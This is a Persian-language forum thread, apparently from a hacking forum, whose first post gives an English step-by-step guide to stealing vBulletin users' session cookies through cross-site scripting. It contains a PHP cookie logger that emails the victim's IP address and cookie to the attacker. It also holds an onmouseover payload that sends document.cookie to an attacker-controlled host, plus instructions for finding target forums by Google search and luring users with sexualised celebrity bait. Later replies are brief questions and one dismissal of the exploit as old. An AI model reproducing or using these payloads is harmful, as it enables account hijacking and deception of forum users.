يك اكسپلويت براي vbulletin 3.5.4 (جديد)

[Eblis-248]

كد:


tep 1. Make a file called "exploit.php".
Step 2. Fill the file with this code:
Code:

<?php $ip_adresse = $_SERVER['REMOTE_ADDR']; if(!empty($ip_adresse)) { echo 'il tuo ip è: ',$ip_adresse; } else { echo 'Impossible d\'afficher l\'IP'; } ?> <a href="log.php"></a><? $xx1=$HTTP_SERVER_VARS['SERVER_PORT']; $day = date("d",time()); $month = date("m",time()); $year = date("Y",time()); if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR; else $visitor_info = $REMOTE_HOST; $base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF; $x1=`host $REMOTE_ADDR|grep Name`; $x2=$REMOTE_PORT; ?> <?php $cookie = $_GET['c']; ?> <?php $myemail = "YOUR ADDRESS E-MAIL"; $today = date("l, F j, Y, g:i a") ; $subject = "Xss Vbulletin" ; $message = "Xss: Hacking Ip: $ip_adresse Cookie: $cookie Url: $base porta usata: $xx1 remote port: $x2 Giorno & Ora : $today \n "; $from = "From: $myemail\r\n"; mail($myemail, $subject, $message, $from); ?>

Step 3. Find the line:
Code:

<?php $myemail = "YOUR ADDRESS E-MAIL";

Step 4a. Replace "YOUR ADDRESS E-MAIL" with your real e-mail address.
Step 4b. Leave the file in a handy place, like your desktop.
Step 5. Make a new *.txt-file
Step 6. Fill the file with this code:
Code:

<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >

Step 7. Find the line:
Code:

location="http://YOUR ADDRESS WEB.com

Step 8. And replace "YOUR ADDRESS WEB.com" with your site + subdomains and where to find exploit. Like: http://www.host.com/hacking/exploit.php
Step 9. Rename the *.txt-file to: "image.gif", make sure you don't have the *.txt at the end, like image.gif.txt.
Step 10. If you have read well (and do well) you have now a file called exploit.php and a file called image.gif
Step 11. Upload the 2 files to your site, in exactly your subdomains, etc. as you did in step 8!
Step 12. Search on google for "powered by vbulletin 3.5.4".
Like a did:
Code:

http://www.google.nl/search?q=%22pow...la:nl:official

Step 13. If you have found any forum of this type register a new account. (if you haven't did that already)
Step 14. Post a new tread and make a little story, like: "I have worked in Angelina Jolie's house as a gardener, now I have special pics of her, bathing in the sun. With the tits...(you can guess that!) Here is one image, I'm posting the others tomorrow."
Step 15. Now post a link to your site where the image is.
Step 16. Post the tread
Step 17. Wait for any dumbass to click the link.
Step 18. If it is good you get a cookie data of an account which is also registered in the forum.
Step 19. HAPPY HACKING!

[amirjan]

جالب بود ! فکر می کنم این روی پرتال های دیگه مثل phpBB هم جواب بده ، چون کوکی ها رو میزنه . ( نمی دونما ! تست نکردم ! )
راستی چه پیشنهادای خلافی میده ! D:

[D3ViiiL]

چندتا سئوال جوجه هکری

1. این vbulletin 3.5.4 چی هست ؟
2. این کدها به چه زبانی هستند ؟
3. اگه به زبان C++ هستند چرا موقعه کامپایل ارور میده ؟
Can't Complie ...............

[amirjan]

1. یه نوع پرتال قدرتمند ، مثل mybb که الان روی همین سایت نصب ، یا phpBB که قبلا نصب بود.
2. یه تیکه اش php یه تیکه اش هم html
3. نه ، ++c نیست.

[kasrakhan]

نه عزیز ! وقتتو با اینا تلف نکن ! اولا این جدید نیست !
دوما مربوط نمیشه به ورژن 3.5.4